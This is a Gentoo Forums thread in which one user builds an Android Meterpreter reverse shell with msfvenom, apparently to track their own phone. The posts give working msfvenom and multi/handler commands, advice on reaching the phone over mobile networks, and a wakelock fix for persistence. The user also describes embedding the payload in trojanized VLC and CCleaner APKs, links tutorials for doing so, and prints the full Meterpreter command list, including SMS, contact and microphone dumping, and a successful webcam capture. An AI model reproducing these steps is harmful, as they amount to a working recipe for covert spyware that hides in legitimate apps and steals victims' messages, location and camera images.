Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
[SOLVED] android metasploit
View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
niceflower
Tux's lil' helper
Tux's lil' helper


Joined: 31 Mar 2017
Posts: 76

PostPosted: Mon Jun 26, 2017 6:38 pm    Post subject: [SOLVED] android metasploit Reply with quote

hello i have a question about a piece of software crafted with the metasploit framework,
it runs fine, only downside is that when the android phone goes into, idle, the meterpreter seems to die, and the only way to restart it, is by launching the payload icon on the android phone again.
for a free payload it does include cool features, however i can not seem to get the meterpreter consistent.
any ideas?
msfconsole:
the payload is called: msfvenom -p android/meterpreter/reverse_tcp LHOST= ip LPORT = 444 r > name.apk
payload is set with:
Code:
set PAYLOAD android/meterpreter/reverse_tcp

it would be nice to have a consistent connection to my phone so i can track if it gets stolen, using google maps.
i know little about who made this payload into the metasploit framework, or if anyone else knows something about it.

*edit* only way i can seem to start the meterpreter is by pressing the icon on the phone :(
the solution would be to make the .apk auto run each time after idle, or even better make it auto run 24/7

i just checked the same payload on my galaxy tab 3, and there the meterpreter stays consistent even when on idle,
so the problem is related to my Huawei p8 phone.


Last edited by niceflower on Tue Jun 27, 2017 12:29 am; edited 1 time in total
Back to top
View user's profile Send private message
niceflower
Tux's lil' helper
Tux's lil' helper


Joined: 31 Mar 2017
Posts: 76

PostPosted: Tue Jun 27, 2017 12:11 am    Post subject: Reply with quote

ok i found it: about the huawei P8 instead of creating tcp:
Code:
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -o name.apk

*to make the payload work outside the lan network for example with 4G mobile network, just use LHOST=your external public ip, and then to start the meterpreter set LHOST=your internal boxen ip
i used http:
Code:
msfvenom -p android/meterpreter/reverse_http LHOST=ip LPORT=4444 -o name.apk

then to start msfconsole:
Code:
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST (put ip here)
set LPORT 4444
exploit
?


when closing down metasploit, and restarting, there is actually no interaction needed with the android device to start a new meterpreter shell.
only downside for now, is that the reverse_http payload can not take webcam snap, stream, wlan_geolocate and some other features, when the telephone is on idle,
however this is not a real concern at this moment for me.

last edit*
i just noticed a wakelock option so everything is working on idle too now with the reverse_http payload on port 4444

sorry for being a bit Gentoo off-topic
Back to top
View user's profile Send private message
niceflower
Tux's lil' helper
Tux's lil' helper


Joined: 31 Mar 2017
Posts: 76

PostPosted: Wed Jun 28, 2017 6:13 pm    Post subject: Reply with quote

Hello !

i explored my android metasploit project, and noticed that is was possible to build in the PAYLOAD into VLC.apk (video lan) and ccleaner.apk (a tool to clean up a phone)

these websites can be very usefull on how to embed the compromised .apk into any existing .apk:
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-0166901/

i can say it works and vlc is running on my huawei P8 now these are some commands from the meterpreter shell on my Kali Rolling Live:
the wakelock command is a bit bugged, and keeping the meterpreter consistent is art.

i have tried to look into creating a service in the vlc.apk with Android Studio Linux: i am stuck on how to create the service hook at this point, to let it run 24/7.
the problem seems still that the meterpreter shell dies over time :(

*edit*
this proves how important it is to "not allow app from untrusted source" turned on in Android, because any .apk from untrusted source, can be manipulated.
Code:
meterpreter > ?
Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/OuZRSbmh.jpeg
meterpreter >
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum